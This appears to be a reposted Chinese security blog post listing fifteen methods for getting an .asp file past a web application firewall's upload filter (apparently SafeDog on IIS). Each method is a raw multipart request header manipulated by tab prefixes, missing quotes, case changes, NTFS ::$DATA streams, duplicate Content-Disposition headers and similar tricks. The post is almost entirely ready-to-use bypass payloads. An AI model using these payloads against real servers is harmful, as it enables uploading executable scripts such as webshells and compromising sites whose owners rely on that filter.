原文链接: https://www.cesafe.com/8411.html
原始请求包:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp” Content-Type: text/html
方法1,文件名前缀加[0x09]绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”[0x09]cesafe.asp” Content-Type: text/html
方法2,文件名去掉双引号绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=cesafe.asp Content-Type: text/html
方法3,添加一个filename1的文件名参数,并赋值绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”;filename1=”test.jpg” Content-Type: text/html
方法4,form变量改成f+orm组合绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: f+orm-data; name=”filepath”;filename=”cesafe.asp” Content-Type: text/html
方法5,文件名后缀大小写绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.Asp” Content-Type: text/html
方法6,去掉form-data变量绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: name=”filepath”; filename=”cesafe.asp” Content-Type: text/html
方法7,在Content-Disposition:后添加多个空格 或者在form-data;后添加多个空格绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data ; name=”filepath”; filename=“cesafe.asp” Content-Type: text/html
方法8,cesafe.asp . (空格+.)绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp .” Content-Type: text/html
方法9,“回车换行,绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp ” Content-Type: text/html
方法10,NTFS流 在文件名后加::$DATA绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp::$DATA” Content-Type: text/html OR ——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp::$DATA0x00fuck.asp0x00.jpg” Content-Type: text/html
方法11,经过对IIS 6.0的测试发现,其总是采用第一个Content-Disposition中的值做为接收参数,而安全狗总是以最后一个Content-Disposition中的值做为接收参数。因此尝试构造如下请求[上传cesafe.asp成功]:
Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.asp” —————————–15377259221471 Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.txt” Content-Type: application/octet-stream Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.asp” Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.asp”
方法12,将Content-Type和ConTent-Disposition调换顺序位置绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Type: text/html ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”
方法13,在文件名前缀加空格(tab键可替换)绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename= “cesafe.asp” Content-Type: text/html
方法14,在form-data前加空格绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data;name=”uploaded”; filename=”cesafe.asp” Content-Type: text/html
方法15,在form-data的前或后加上+绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: +form-data; name=”filepath”; filename=”cesafe.asp” Content-Type: text/html